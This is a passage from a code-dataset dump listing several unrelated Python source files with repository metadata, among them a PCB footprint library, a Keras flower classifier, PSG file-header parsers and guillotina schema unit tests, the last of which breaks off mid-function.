hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ac844765c4ce5c32dfa9aa2da4c0094d7fbd95aa
| 154
|
py
|
Python
|
convert.py
|
Resist4263/span-aste-1
|
13815a262638592506b445315d03df8db965947b
|
[
"Apache-2.0"
] | null | null | null |
convert.py
|
Resist4263/span-aste-1
|
13815a262638592506b445315d03df8db965947b
|
[
"Apache-2.0"
] | null | null | null |
convert.py
|
Resist4263/span-aste-1
|
13815a262638592506b445315d03df8db965947b
|
[
"Apache-2.0"
] | null | null | null |
from gensim.scripts.glove2word2vec import glove2word2vec
(count, dimensions) = glove2word2vec("dataset/glove.42B.300d.txt", "dataset/cropus/42B_w2v.txt")
| 51.333333
| 96
| 0.811688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 56
| 0.363636
|
ac854af38b11787c1689126c56bfc2405c99c2c4
| 4,970
|
py
|
Python
|
src/pcbLibraryManager/libraries/librarySwitches.py
|
NiceCircuits/pcbLibraryManager
|
df83f24b5a558e0f7f72629d9ef7c82fcb9e6718
|
[
"CC0-1.0"
] | null | null | null |
src/pcbLibraryManager/libraries/librarySwitches.py
|
NiceCircuits/pcbLibraryManager
|
df83f24b5a558e0f7f72629d9ef7c82fcb9e6718
|
[
"CC0-1.0"
] | 1
|
2016-04-16T08:16:36.000Z
|
2016-04-16T08:16:36.000Z
|
src/pcbLibraryManager/libraries/librarySwitches.py
|
NiceCircuits/pcbLibraryManager
|
df83f24b5a558e0f7f72629d9ef7c82fcb9e6718
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 19 22:17:33 2015
@author: piotr at nicecircuits.com
"""
from libraryManager.library import libraryClass
from footprints.footprintSmdDualRow import footprintSmdDualRow
from libraryManager.part import part
from libraryManager.symbol import symbol
from libraryManager.symbolPrimitive import *
from libraryManager.footprintPrimitive import *
from libraryManager.defaults import defaults
from libraryManager.generateLibraries import generateLibraries
class librarySwitches(libraryClass):
"""
"""
def __init__(self):
super().__init__("niceSwitches")
for v in ["H","V"]:
for h in [4.3, 5, 7, 9.5, 13, 19]:
self.parts.append(partMicroswitchSmt(h,v))
self.parts.append(partMicroswitchSmt6x4(v))
class partMicroswitchSmt(part):
"""
Default SMT microswitch
"""
def __init__(self, height, variant="H"):
variantStr = "_V" if variant=="V" else ""
name = "MicroswitchSmt-%1.1f%s" % (height, variantStr)
super().__init__(name, defaults.switchRefDes)
self.symbols.append(symbolButton(variant=variant))
for density in ["N", "L", "M"]:
self.footprints.append(footprintMicroswitchSmt(density, height))
class partMicroswitchSmt6x4(part):
"""
SMT microswitch 6x4mm
"""
def __init__(self,variant="H"):
variantStr = "_V" if variant=="V" else ""
name = "MicroswitchSmt6x4%s" % variantStr
super().__init__(name, defaults.switchRefDes)
self.symbols.append(symbolButton(variant=variant))
for density in ["N", "L", "M"]:
self.footprints.append(footprintMicroswitchSmt6x4(density))
class symbolButton(symbol):
"""Button symbol
"""
def __init__(self, name="button", refDes=defaults.switchRefDes, showPinNames=False,\
showPinNumbers=False, pinNumbers=[1,2], variant="H"):
super().__init__(name, refDes, showPinNames, showPinNumbers)
for i in range(2):
self.pins.append(symbolPin(i+1, pinNumbers[i], [200 if i else -200,0],\
100, pinType.passive, rotation=180 if i else 0))
self.primitives.append(symbolCircle(defaults.symbolLineWidth,\
[75 if i else -75, 0], 25))
self.primitives.append(symbolLine(defaults.symbolThickLineWidth,\
-100, 50, 100, 50))
self.primitives.append(symbolRectangle(0, -25, 50, 25, 75,\
filled=fillType.foreground))
if variant=="H":
self.nameObject.position=[0, 120]
self.valueObject.position=[0, -80]
elif variant=="V":
self.movePrimitives([0,0],90)
self.nameObject.position=[50, 50]
self.nameObject.align=textAlign.centerLeft
self.valueObject.position=[50, -50]
self.valueObject.align=textAlign.centerLeft
else:
raise ValueError("unsupported variant %s" % variant)
class footprintMicroswitchSmt(footprintSmdDualRow):
"""Default SMT microswitch
"""
def __init__(self, density, height=4.3, name="", alternativeLibName="niceSwitches"):
"""
density: "L" - least, "N" - nominal, "M" - most
"""
if not name:
name="MicroswitchSmd-%1.1f_%s" % (height, density)
# pads
padSizes={"L":[1.3,2], "N":[1.3,2], "M":[1.4,2.5]}
padSpan={"L":8.5, "N":8.5, "M":9}
super().__init__(name, alternativeLibName,\
pinCount= 4,\
pitch=4.5,\
padSpan=padSpan[density],\
padDimensions=padSizes[density],\
bodyDimensions=[6.2, 6.2, 3.6],\
originMarkSize=defaults.originMarkSize,
leadDimensions=[1.9, 0.7, 1],\
court=defaults.court[density],\
firstPinMarker=False)
self.addCylinder3Dbody([0,0,0], [3.5,3.5,height])
self.renamePads([1,2,2,1])
class footprintMicroswitchSmt6x4(footprintSmdDualRow):
"""
SMT microswitch 6x4mm
"""
def __init__(self, density, name="", alternativeLibName="niceSwitches"):
"""
density: "L" - least, "N" - nominal, "M" - most
"""
if not name:
name="MicroswitchSmd6x4_%s" % ( density)
# pads
padSizes={"L":[1.2,1.3], "N":[1.4,1.5], "M":[1.6,1.7]}
padSpan={"L":7.7, "N":7.8, "M":7.9}
super().__init__(name, alternativeLibName,\
pinCount= 2,\
pitch=4.5,\
padSpan=padSpan[density],\
padDimensions=padSizes[density],\
bodyDimensions=[3.9,6.3,2],\
originMarkSize=defaults.originMarkSize,
leadDimensions=[1, 0.6, 1],\
court=defaults.court[density],\
firstPinMarker=False)
self.addSimple3Dbody([0,0,0], [1.2,2.6,2.5],file="cube_metal")
if __name__ == "__main__":
generateLibraries([librarySwitches()])
| 38.230769
| 88
| 0.597988
| 4,348
| 0.874849
| 0
| 0
| 0
| 0
| 0
| 0
| 723
| 0.145473
|
ac85b889248a7fe66df90411b1896a2b3cc25961
| 131
|
py
|
Python
|
Codeforces/problems/0799/A/799A.py
|
object-oriented-human/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | 2
|
2021-07-27T10:46:47.000Z
|
2021-07-27T10:47:57.000Z
|
Codeforces/problems/0799/A/799A.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
Codeforces/problems/0799/A/799A.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
import math
n, t, k, d = map(int, input().split())
x = math.ceil(n/k) * t
if (d + t) < x:
print("YES")
else:
print("NO")
| 13.1
| 38
| 0.503817
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.068702
|
ac8615af3d9f334ab252cb1f100f3ad3f649766c
| 3,159
|
py
|
Python
|
model.py
|
ganeshpc/flower-classification
|
aa836389f04b40a4368d4c1bf2c13cc44ee51af1
|
[
"MIT"
] | null | null | null |
model.py
|
ganeshpc/flower-classification
|
aa836389f04b40a4368d4c1bf2c13cc44ee51af1
|
[
"MIT"
] | null | null | null |
model.py
|
ganeshpc/flower-classification
|
aa836389f04b40a4368d4c1bf2c13cc44ee51af1
|
[
"MIT"
] | null | null | null |
import keras
from keras import layers
from keras.layers import Dropout, Dense
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import tensorflow_hub as hub
import cv2
import pandas as p
IMAGE_SHAPE = (224, 224) #(HEIGHT, WIDTH)
TRAINING_DATA_DIRECTORY = '/content/drive/My Drive/Colab Notebooks/FlowerClassification/data/TrainingData'
datagen_kwargs = dict(rescale=1./255, validation_split=.2)
def get_validation_generator():
validation_datagen = ImageDataGenerator(**datagen_kwargs)
validation_generator = validation_datagen.flow_from_directory(
TRAINING_DATA_DIRECTORY,
subset='validation',
shuffle=True,
target_size=IMAGE_SHAPE
)
return validation_generator
def get_training_generator():
training_datagen = ImageDataGenerator(**datagen_kwargs)
training_generator = training_datagen.flow_from_directory(
TRAINING_DATA_DIRECTORY,
subset='training',
shuffle=True,
target_size=IMAGE_SHAPE
)
return training_generator
def get_mobile_net_model():
model = keras.Sequential()
model.add(hub.KerasLayer(
'https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4',
output_shape=[1280],
trainable=False)
)
model.add(Dropout(0.4))
model.add(Dense(training_generator.num_classes, activation='softmax'))
model.build([None, 224, 224, 3])
model.summary()
return model
def train_model(model, training_generator=None, validation_generator=None):
if (training_generator == None):
training_generator = get_training_generator()
if (validation_generator == None):
validation_generator = get_validation_generator()
optimizer = keras.optimizers.Adam(lr=1e-3)
model.compile(
optimizer=optimizer,
loss='categorical_crossentropy',
metrics=['acc']
)
steps_per_epoch = np.ceil(
training_generator.samples / training_generator.batch_size
)
validation_steps_per_epoch = np.ceil(
validation_generator.samples / validation_generator.batch_size
)
hist = model.fit(
training_generator,
epochs=20,
verbose=1,
steps_per_epoch=steps_per_epoch,
validation_data=validation_generator,
validation_steps=validation_steps_per_epoch
).history
print('model trained')
model.save('/content/drive/My Drive/Colab Notebooks/FlowerClassification/model_100_epochs.h5')
print('model saved')
#converting history.history dictionary to pandas dataframe
hist_df = pd.DataFrame(history.history)
# save to json
hist_json_file = 'history_100_epochs.json'
with open(hist_json_file, mode='w') as f:
hist_df.to_json(f)
return model
def evaluate_model(model):
final_loss, final_accuracy = model.evaluate(validation_generator, steps = validation_steps_per_epoch)
print("Final Loss: ", final_loss)
print("Final accuracy: ", final_accuracy * 100)
if __name__ == '__main__':
model = get_mobile_net_model()
model = train_model(model)
evaluate_model(model)
| 24.679688
| 106
| 0.709085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 478
| 0.151314
|
ac86900c935920ddf1e7d5f2d9ab4b10680baaec
| 12,421
|
py
|
Python
|
psg_utils/io/header/header_standardizers.py
|
perslev/sleep-utils
|
9f9edf67f4cac6d8361243b4153bfe6351314844
|
[
"MIT"
] | 1
|
2022-03-17T10:37:17.000Z
|
2022-03-17T10:37:17.000Z
|
psg_utils/io/header/header_standardizers.py
|
perslev/sleep-utils
|
9f9edf67f4cac6d8361243b4153bfe6351314844
|
[
"MIT"
] | null | null | null |
psg_utils/io/header/header_standardizers.py
|
perslev/sleep-utils
|
9f9edf67f4cac6d8361243b4153bfe6351314844
|
[
"MIT"
] | null | null | null |
"""
A set of functions for extracting header information from PSG objects
Typically only used internally in from unet.io.header.header_extractors
Each function takes some PSG or header-like object and returns a dictionary with at least
the following keys:
{
'n_channels': int,
'channel_names': list of strings,
'sample_rate': int
'date': datetime or None
'length': int
}
Note: length gives the number of samples, divide by sample_rate to get length_sec
"""
import logging
import warnings
import numpy as np
import h5py
from datetime import datetime
from psg_utils.errors import (MissingHeaderFieldError, HeaderFieldTypeError,
LengthZeroSignalError, H5VariableAttributesError,
VariableSampleRateError, FloatSampleRateWarning)
logger = logging.getLogger(__name__)
def _assert_header(header):
"""
Checks that a standardized header:
1) contains the right field names
2) each value has an expected type
3) the 'length' value is greater than 0
Args:
header: dict
Returns: dict
"""
field_requirements = [
("n_channels", [int]),
("channel_names", [list]),
("sample_rate", [int]),
("date", [datetime, type(None)]),
("length", [int])
]
for field, valid_types in field_requirements:
if field not in header:
raise MissingHeaderFieldError(f"Missing value '{field}' from header '{header}'. "
"This could be an error in the code implementation. "
"Please raise this issue on GitHub.")
type_ = type(header[field])
if type_ not in valid_types:
raise HeaderFieldTypeError(f"Field {field} of type {type_} was not expected, expected one of {valid_types}")
if header['length'] <= 0:
raise LengthZeroSignalError(f"Expected key 'length' to be a non-zero integer, "
f"but header {header} has value {header['length']}")
# Warn on duplicate channels
from psg_utils.io.channels.utils import check_duplicate_channels
check_duplicate_channels(header['channel_names'], raise_or_warn="warn")
return header
def _sample_rate_as_int(sample_rate, raise_or_warn='warn'):
"""
Returns the sample rate rounded to the nearest whole integer.
If the integer sample rate is not exactly (as determined by np.isclose) equal to the original,
possibly floating, value an warning is issued if raise_or_warn="warn" or an FloatSampleRateError
is raised if raise_or_warn="raise".
Raises ValueError if raise_or_warn not in ('raise', 'warn', 'warning').
Args:
sample_rate: int, float sample rate
Returns:
sample_rate, int
"""
new_sample_rate = int(np.round(sample_rate))
if not np.isclose(new_sample_rate, sample_rate):
s = f"The loaded file has a float sample rate of value {sample_rate} which is not exactly equal to the " \
f"rounded integer value of {new_sample_rate}. Please note: Integer value {new_sample_rate} will be used."
if raise_or_warn.lower() == "raise":
raise FloatSampleRateWarning(s)
elif raise_or_warn.lower() in ("warn", "warning"):
warnings.warn(s, FloatSampleRateWarning)
else:
raise ValueError("raise_or_warn argument must be one of 'raise' or 'warn'.")
return new_sample_rate
def _standardized_edf_header(raw_edf, channel_names_overwrite=None):
"""
Header extraction function for RawEDF and Raw objects.
Reads the number of channels, channel names and sample rate properties
If existing, reads the date information as well.
channel_names_overwrite allows passing a list of channel names to use instead of
those loaded by MNE per default. This is useful e.g. to set the raw EDF names in the
header instead of the truncated / renamed (on duplicates) used by MNE.
Returns:
Header information as dict
"""
# Each tuple below follows the format:
# 1) output name, 2) edf_obj name, 3) function to apply to the read
# value, 4) whether a missing value should raise an error.
header_map = [("n_channels", "nchan", int, True),
("channel_names", "ch_names", list, True),
("sample_rate", "sfreq", _sample_rate_as_int, True),
("date", "meas_date", datetime.utcfromtimestamp, False)]
if isinstance(raw_edf.info["meas_date"], (tuple, list)):
assert raw_edf.info["meas_date"][1] == 0
raw_edf.info["meas_date"] = raw_edf.info["meas_date"][0]
header = {}
for renamed, org, transform, raise_err in header_map:
value = raw_edf.info.get(org)
try:
value = transform(value)
except Exception as e:
if raise_err:
raise HeaderFieldTypeError("Missing or invalid value in EDF file for key {} "
"- got {}".format(org, value)) from e
header[renamed] = value
header["length"] = len(raw_edf)
header["channel_names"] = list(channel_names_overwrite) or header["channel_names"]
return _assert_header(header)
def _standardized_wfdb_header(wfdb_record):
"""
Header extraction function for WFDB Record objects.
Reads the number of channels, channel names and sample rate properties
If existing, reads the date information as well.
Returns:
Header information as dict
"""
# Each tuple below follows the format:
# 1) output name, 2) record_obj name, 3) function to apply to the read
# value, 4) whether a missing value should raise an error.
header_map = [("n_channels", "n_sig", int, True),
("channel_names", "sig_name", list, True),
("sample_rate", "fs", _sample_rate_as_int, True),
("date", "base_date", datetime.utcfromtimestamp, False),
("length", "sig_len", int, True)]
header = {}
for renamed, org, transform, raise_err in header_map:
value = getattr(wfdb_record, org, None)
try:
value = transform(value)
except Exception as e:
if raise_err:
raise HeaderFieldTypeError("Missing or invalid value in WFDB file for key {} "
"- got {}".format(org, value)) from e
header[renamed] = value
return _assert_header(header)
def _traverse_h5_file(root_node, attributes=None):
attributes = dict((attributes or {}))
attributes.update(root_node.attrs)
results = {}
if isinstance(root_node, h5py.Dataset):
# Leaf node
attributes["length"] = len(root_node)
results[root_node.name] = attributes
else:
for key in root_node:
results.update(_traverse_h5_file(root_node[key], attributes))
return results
def _get_unique_value(items):
"""
Takes a list of items, checks that all are equal (in value, ==) and returns the unique value.
Returns None if the list is empty.
Raises ValueError if not all items are not equal.
Args:
items: List
Returns:
The unique item in list
"""
if len(items) == 0:
return None
for item in items[1:]:
if item != items[0]:
raise H5VariableAttributesError(f"The input list '{items}' contains more than 1 unique value")
return items[0]
def _standardized_h5_header(h5_file, channel_group_name="channels"):
"""
Header extraction function for h5py.File objects.
The object must:
- Have an attribute 'sample_rate'
- Have a group named {channel_group_name} which stores the data for all channels as
Dataset entries under the group (can be nested in deeper groups too)
Can have:
- An attribute 'date' which gives a date string or unix timestamp integer
Currently raises an error if any attribute in ('date', 'sample_rate', 'length') are not equal among all
datasets in the archive.
All attributes may be set at any node, and will affect any non-attributed node deeper in the tree.
E.g. setting the 'sample_rate' attribute on the root note will have it affect all datasets, unless
the attribute is set on deeper nodes too in which case the later will overwrite the root attribute for
all its nested, un-attributed children.
Returns:
Header information as dict
"""
# Traverse the h5 archive for datasets and assigned attributes
h5_content = _traverse_h5_file(h5_file[channel_group_name], attributes=h5_file.attrs)
header = {
"channel_names": [],
"channel_paths": {}, # will store channel_name: channel path entries
"sample_rate": [],
"date": [],
"length": []
}
for channel_path, attributes in h5_content.items():
channel_name = channel_path.split("/")[-1]
header["channel_paths"][channel_name] = channel_path
header["channel_names"].append(channel_name)
header["sample_rate"].append(attributes.get("sample_rate"))
header["date"].append(attributes.get("date"))
header["length"].append(attributes.get("length"))
header["n_channels"] = len(h5_content)
# Ensure all dates, lengths and sample rate attributes are equal
# TODO: Remove this restriction at least for sample rates; requires handling at PSG loading time
try:
header["date"] = _get_unique_value(header["date"])
header["sample_rate"] = _sample_rate_as_int(_get_unique_value(header["sample_rate"]))
header["length"] = int(_get_unique_value(header["length"]))
except H5VariableAttributesError as e:
raise H5VariableAttributesError("Datasets stored in the specified H5 archive differ with respect to one or "
"multiple of the following attributes: 'date', 'sampling_rate', 'length'. "
"All datasets must currently match with respect to those attributes.") from e
# Get datetime date or set to None
date = header["date"]
if not isinstance(date, str) and (isinstance(date, int) or np.issubdtype(date, np.integer)):
date = datetime.utcfromtimestamp(date)
elif not isinstance(date, datetime):
date = None
header["date"] = date
return _assert_header(header)
def _standardized_bin_header(raw_header):
"""
Header extraction function for custom dict type headers for data in .bin files.
Raw header has structure:
{"CHX": [list of channel inds], "NAME": [list of channel names],
"TYPE": [list of channel types], "FS": [list of channel sample rates]}
All values stored in the header are strings and should be cast to ints. etc as appropriate
for header standardization.
Currently raises an error if all attribute in header["FS"] are not equal
(i.e., same sample rate is required for all channels).
Returns:
Header information as dict
"""
# Assert upper case keys
raw_header = {key.upper(): values for key, values in raw_header.items()}
# Order header entries according to CHX column
order = np.argsort(np.array(raw_header['CHX'], dtype=np.int))
raw_header = {key: ([entry[i] for i in order]
if isinstance(entry, (list, tuple, np.ndarray))
else entry)
for key, entry in raw_header.items()}
# Assert that all samples rates are equal
sample_rates = np.array(raw_header["FS"], dtype=np.int32)
if not (sample_rates[0] == sample_rates).all():
raise VariableSampleRateError(f"Sample rates in header {raw_header} are not "
f"all equal with rates: {sample_rates}. "
f"The data loaders for .bin formatted files currently "
f"support only files with all channels sampled at equal rates.")
# Build standardized header
header = {
"n_channels": len(raw_header["NAME"]),
"channel_names": list(raw_header["NAME"]),
"sample_rate": _sample_rate_as_int(sample_rates[0]),
"date": None,
"length": int(raw_header["LENGTH"]),
"channel_types": [type_.upper() for type_ in raw_header.get("TYPE", [])]
}
return _assert_header(header)
| 41.821549
| 120
| 0.646164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 6,456
| 0.519765
|
ac8b1415e78b57c9f8a18413e55459164d6e3fa4
| 2,620
|
py
|
Python
|
py/hover/cfg.py
|
HomeSmartMesh/raspi
|
43ecd07c130144c72d7c7da677eab1980d555cc2
|
[
"MIT"
] | 16
|
2019-12-19T09:23:05.000Z
|
2022-01-25T18:34:36.000Z
|
py/hover/cfg.py
|
HomeSmartMesh/raspi
|
43ecd07c130144c72d7c7da677eab1980d555cc2
|
[
"MIT"
] | 4
|
2020-06-07T08:13:29.000Z
|
2021-09-04T09:34:37.000Z
|
py/hover/cfg.py
|
HomeSmartMesh/raspi
|
43ecd07c130144c72d7c7da677eab1980d555cc2
|
[
"MIT"
] | 3
|
2020-08-28T13:00:30.000Z
|
2020-12-17T09:10:19.000Z
|
import sys,os
import json
import logging as log
import socket
from collections import OrderedDict
import datetime
from platform import system as system_name # Returns the system/OS name
from subprocess import call as system_call # Execute a shell command
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.
"""
# Ping command count option as function of OS
param = '-n' if system_name().lower()=='windows' else '-c'
# Building the command. Ex: "ping -c 1 google.com"
command = ['ping', param, '1', host]
# Pinging
return system_call(command) == 0
# -------------------- config --------------------
def get_local_json():
"""fetches the config.json file in the local directory
if config_hostname.json is found it is used over the default one
"""
config = None
dirname = os.path.dirname(sys.argv[0])
if(len(dirname) == 0):
dirname = "."
config_file = dirname+'/'+"config_"+socket.gethostname()+".json"
if(os.path.isfile(config_file)):
print("loading: ",config_file)
config = json.load(open(config_file))
else:
config_file = dirname+'/'+"config.json"
if(os.path.isfile(config_file)):
print("loading: %s",config_file)
config = json.load(open(config_file))
else:
print("Fatal error 'config.json' not found")
return config
# -------------------- config --------------------
def get_local_nodes(nodes_file):
nodes = json.load(open(nodes_file),object_pairs_hook=OrderedDict)
return nodes
def configure_log(logger_name):
global_config = get_local_json()
config = global_config["log"]
log_level_map = {
"Debug" :10,
"Info" :20,
"Warning" :30,
"Error" :40,
"Critical" :50
}
#if(os.path.isfile(config["logfile"])):
for handler in log.root.handlers[:]:
log.root.removeHandler(handler)
log.basicConfig( filename=config["logfile"],
level=log_level_map[config["level"]],
format='%(asctime)s %(name)s %(levelname)-8s %(message)s',
datefmt='%d %H:%M:%S'
)
log.getLogger('').addHandler(log.StreamHandler())
log.info("====> '%s' started logging with level '%s' @ '%s'"%(logger_name,config["level"],str(datetime.datetime.utcnow())))
#else:
# print("Log file not available : %s"%(config["logfile"]))
return global_config
| 34.473684
| 127
| 0.594656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 975
| 0.372137
|
ac8b3ba743761efaa0df8e7bef2daa017b63a13e
| 27,156
|
py
|
Python
|
guillotina/schema/tests/test__bootstrapfields.py
|
diefenbach/guillotina
|
a8c7247fca8294752901f643b35c5ed1c5dee76d
|
[
"BSD-2-Clause"
] | null | null | null |
guillotina/schema/tests/test__bootstrapfields.py
|
diefenbach/guillotina
|
a8c7247fca8294752901f643b35c5ed1c5dee76d
|
[
"BSD-2-Clause"
] | null | null | null |
guillotina/schema/tests/test__bootstrapfields.py
|
diefenbach/guillotina
|
a8c7247fca8294752901f643b35c5ed1c5dee76d
|
[
"BSD-2-Clause"
] | null | null | null |
##############################################################################
#
# Copyright (c) 2012 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
# flake8: noqa
import unittest
class ValidatedPropertyTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import ValidatedProperty
return ValidatedProperty
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test___set___not_missing_w_check(self):
_checked = []
def _check(inst, value):
_checked.append((inst, value))
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop', _check)
inst = Test()
inst.prop = 'PROP'
self.assertEqual(inst._prop, 'PROP')
self.assertEqual(_checked, [(inst, 'PROP')])
def test___set___not_missing_wo_check(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test(ValueError)
def _provoke(inst):
inst.prop = 'PROP'
self.assertRaises(ValueError, _provoke, inst)
self.assertEqual(inst._prop, None)
def test___set___w_missing_wo_check(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test(ValueError)
inst.prop = DummyInst.missing_value
self.assertEqual(inst._prop, DummyInst.missing_value)
def test___get__(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst._prop = 'PROP'
self.assertEqual(inst.prop, 'PROP')
class DefaultPropertyTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import DefaultProperty
return DefaultProperty
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test___get___wo_defaultFactory_miss(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst.defaultFactory = None
def _provoke(inst):
return inst.prop
self.assertRaises(KeyError, _provoke, inst)
def test___get___wo_defaultFactory_hit(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst.defaultFactory = None
inst._prop = 'PROP'
self.assertEqual(inst.prop, 'PROP')
def test__get___wo_defaultFactory_in_dict(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test()
inst._prop = 'PROP'
self.assertEqual(inst.prop, 'PROP')
def test___get___w_defaultFactory_not_ICAF_no_check(self):
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop')
inst = Test(ValueError)
def _factory():
return 'PROP'
inst.defaultFactory = _factory
def _provoke(inst):
return inst.prop
self.assertRaises(ValueError, _provoke, inst)
def test___get___w_defaultFactory_w_ICAF_w_check(self):
from zope.interface import directlyProvides
from guillotina.schema._bootstrapinterfaces \
import IContextAwareDefaultFactory
_checked = []
def _check(inst, value):
_checked.append((inst, value))
class Test(DummyInst):
_prop = None
prop = self._makeOne('_prop', _check)
inst = Test(ValueError)
inst.context = object()
_called_with = []
def _factory(context):
_called_with.append(context)
return 'PROP'
directlyProvides(_factory, IContextAwareDefaultFactory)
inst.defaultFactory = _factory
self.assertEqual(inst.prop, 'PROP')
self.assertEqual(_checked, [(inst, 'PROP')])
self.assertEqual(_called_with, [inst.context])
class FieldTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Field
return Field
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
field = self._makeOne()
self.assertEqual(field.__name__, '')
self.assertEqual(field.__doc__, '')
self.assertEqual(field.title, '')
self.assertEqual(field.description, '')
self.assertEqual(field.required, True)
self.assertEqual(field.readonly, False)
self.assertEqual(field.constraint(object()), True)
self.assertEqual(field.default, None)
self.assertEqual(field.defaultFactory, None)
self.assertEqual(field.missing_value, None)
self.assertEqual(field.context, None)
def test_ctor_w_title_wo_description(self):
field = self._makeOne('TITLE')
self.assertEqual(field.__name__, '')
self.assertEqual(field.__doc__, 'TITLE')
self.assertEqual(field.title, 'TITLE')
self.assertEqual(field.description, '')
def test_ctor_wo_title_w_description(self):
field = self._makeOne(description='DESC')
self.assertEqual(field.__name__, '')
self.assertEqual(field.__doc__, 'DESC')
self.assertEqual(field.title, '')
self.assertEqual(field.description, 'DESC')
def test_ctor_w_both_title_and_description(self):
field = self._makeOne('TITLE', 'DESC', 'NAME')
self.assertEqual(field.__name__, 'NAME')
self.assertEqual(field.__doc__, 'TITLE\n\nDESC')
self.assertEqual(field.title, 'TITLE')
self.assertEqual(field.description, 'DESC')
def test_ctor_order_madness(self):
klass = self._getTargetClass()
order_before = klass.order
field = self._makeOne()
order_after = klass.order
self.assertEqual(order_after, order_before + 1)
self.assertEqual(field.order, order_after)
def test_explicit_required_readonly_missingValue(self):
obj = object()
field = self._makeOne(required=False, readonly=True, missing_value=obj)
self.assertEqual(field.required, False)
self.assertEqual(field.readonly, True)
self.assertEqual(field.missing_value, obj)
def test_explicit_constraint_default(self):
_called_with = []
obj = object()
def _constraint(value):
_called_with.append(value)
return value is obj
field = self._makeOne(
required=False, readonly=True, constraint=_constraint, default=obj
)
self.assertEqual(field.required, False)
self.assertEqual(field.readonly, True)
self.assertEqual(_called_with, [obj])
self.assertEqual(field.constraint(self), False)
self.assertEqual(_called_with, [obj, self])
self.assertEqual(field.default, obj)
def test_explicit_defaultFactory(self):
_called_with = []
obj = object()
def _constraint(value):
_called_with.append(value)
return value is obj
def _factory():
return obj
field = self._makeOne(
required=False,
readonly=True,
constraint=_constraint,
defaultFactory=_factory,
)
self.assertEqual(field.required, False)
self.assertEqual(field.readonly, True)
self.assertEqual(field.constraint(self), False)
self.assertEqual(_called_with, [self])
self.assertEqual(field.default, obj)
self.assertEqual(_called_with, [self, obj])
self.assertEqual(field.defaultFactory, _factory)
def test_explicit_defaultFactory_returning_missing_value(self):
def _factory():
return None
field = self._makeOne(required=True,
defaultFactory=_factory)
self.assertEqual(field.default, None)
def test_bind(self):
obj = object()
field = self._makeOne()
bound = field.bind(obj)
self.assertEqual(bound.context, obj)
expected = dict(field.__dict__)
found = dict(bound.__dict__)
found.pop('context')
self.assertEqual(found, expected)
self.assertEqual(bound.__class__, field.__class__)
def test_validate_missing_not_required(self):
missing = object()
def _fail(value):
return False
field = self._makeOne(
